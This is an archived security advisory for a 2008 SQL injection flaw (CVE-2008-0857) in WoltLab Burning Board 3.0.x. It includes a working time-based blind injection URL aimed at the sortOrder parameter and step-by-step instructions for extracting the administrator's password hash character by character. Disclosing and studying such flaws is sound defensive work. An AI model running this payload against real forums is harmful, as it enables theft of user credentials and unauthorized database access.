Bug: WoltLab Burning Board 3.0.3 PL1 SQL-Injection Vulnerability ( Ascii Version )

Search:
WLB2

WoltLab Burning Board 3.0.3 PL1 SQL-Injection Vulnerability

Published
Credit
Risk
2008.02.21
nbbn
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2008-0857
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

########################################################################
######################
WoltLab Burning Board 3.0.3 PL1 SQL Injection Vulnerability by NBBN
Vendor: http://woltlab.de
########################################################################
######################

::Proof of Concept
http://site.tld/wbb3/index.php?page=PMList&folderID=0&pageNo=1&sortField
=isViewed&sortOrder=ASC,
(SELECT password FROM wcf1_user WHERE userID=1 AND
IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1))

An attacker should have to register at the board to use this.

You can ask TRUE/FALSE questions to the database. Modify 3000000 if the stuff
doesn't work. On some MySQL Versions you need to edit this query

::Explain:

...AND IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1))

1,1 is the position in the crypted password. 55 is the char in the
ascii-table.

In this example we ask for number 7 in the hash, position 1. If the page load
fast, you find a true char. If not, ask other chars ;-).If you enter a char
that is higher then the true's, the page load fast to, so start from 48 first
and go higher.

::Vulnerabiltiy
As I found this, WBB 3.0.4 was only running at the supportforums of woltlab so
I don't test it, because there is no reason and I am not a cracker ;-)

WoltLab Burning Board 3.0.3 PLX
WoltLab Burning Board 3.0.2 PLX
WoltLab Burning Board 3.0.1 PLX
WoltLab Burning Board 3.0.0 PLX
Possible WoltLab Burning Board 3.0.4 (not tested)...

Please don't use this to crack forums. All what you do with this is at your
own risk.

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version